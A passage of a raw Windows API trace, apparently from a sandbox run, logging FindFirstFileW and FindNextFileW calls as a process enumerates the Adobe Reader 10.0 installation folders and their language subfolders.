lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.312] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.312] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiodLite.dll", cAlternateFileName="")) returned 1 [0058.312] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiodLite.dll", cAlternateFileName="")) returned 0 [0058.312] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.312] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0x0, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0058.312] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0058.312] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0058.313] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0058.313] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.313] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.314] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x32398, dwReserved0=0x0, dwReserved1=0x0, cFileName="A3DUtils.dll", cAlternateFileName="")) returned 1 [0058.314] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc7d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACE.dll", cAlternateFileName="")) returned 1 [0058.314] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x47f98, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroBroker.exe", cAlternateFileName="ACROBR~1.EXE")) returned 1 [0058.314] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802ba700, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.319] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.320] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d95e8c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.322] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.323] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.326] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81efec40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.328] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.328] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8039ef40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8039ef40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8039ef40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.329] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.329] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8039ef40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8039ef40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8039ef40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.330] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.330] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a50d20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a50d20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.331] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.331] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80378de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80378de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.333] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.333] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8058e120, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805b4280, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805b4280, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.334] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.334] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8058e120, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8058e120, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.335] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.335] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805b4280, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805b4280, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.336] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.336] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cfb2f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cfb2f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.337] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.337] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805b4280, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805b4280, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.338] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.338] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a2abc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a2abc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.338] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.339] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a2abc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a2abc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.340] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.340] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805da3e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805da3e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.340] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.340] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805da3e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805da3e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.341] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.341] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805da3e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805da3e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.342] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.343] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805da3e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805da3e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.346] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.348] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805da3e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805da3e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.349] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.349] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a2abc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a2abc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.350] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.350] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805b4280, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805b4280, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.351] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.351] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, 